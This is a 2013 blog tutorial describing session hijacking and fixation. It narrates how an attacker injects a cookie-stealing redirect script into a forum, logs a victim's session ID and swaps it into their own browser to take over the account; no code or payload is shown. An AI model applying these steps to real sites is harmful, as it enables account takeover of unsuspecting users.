Wednesday, 27 February 2013

Session Hijacking and Fixation

Session hijacking basically refers to hijacking a server's particular session where as Session Fixation means authenticating a user without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions.

The combined attack of  Session Hijacking and Session Fixation gives a malicious user full access as an authenticated use.

Web Applications requires Cookies to store temporary data. Sometimes these cookies stores session ID of a logged in user.This enables the user to be uniquely identified by the server till he logs out and the session is being destroyed.

The attack can be represented as follow

For this demonstration I am using 

  • Firefox Browser ( Attacker )
  • Comodo IceDragon Browser ( Victim )
  • Tamper data ( Firefox Addon )
  • This tutorial requires Cookie Stealing Methods. If you dont know about it check my previous post.
"This tutorial should be used for educational purpose only. I won't be responsible if you misuse this techniques and get yourself in trouble.Performing such attacks without the permission of the owner can lead to serious trouble."

Let the attacker user first logs in using his own credentials

 Now this is the information displayed about the attacker after logging in

Now the attacker goes to a forum and inject the malicious script 

What exactly happen at this level is that the script injected contains a redirection to a cookie stealer script.This cookie catcher script stores the cookie information in a log file and later this log file is used to extract the information about the cookies. After injecting the code the attacker waits for the victim to log and enter the  forum.

Now the victim  logs in

 Now this is the information displayed about the victim after logging in

Once the victim enter the forum page the cookies are retrieved and the page is redirected to the cookie catcher page and the cookie information  gets logged in the log file

Now the attacker copies this session ID and manipulates his existing session ID with the hijacked  session ID.

And now if the attacker checks the information then he will find that the  information of the user will be displayed whose session has been hijacked . That means the attacker has hacked into the account of another user as a authentic user.

Thank You